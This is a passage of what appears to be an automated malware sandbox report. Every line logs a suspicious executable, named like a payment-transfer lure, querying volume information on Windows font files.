Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
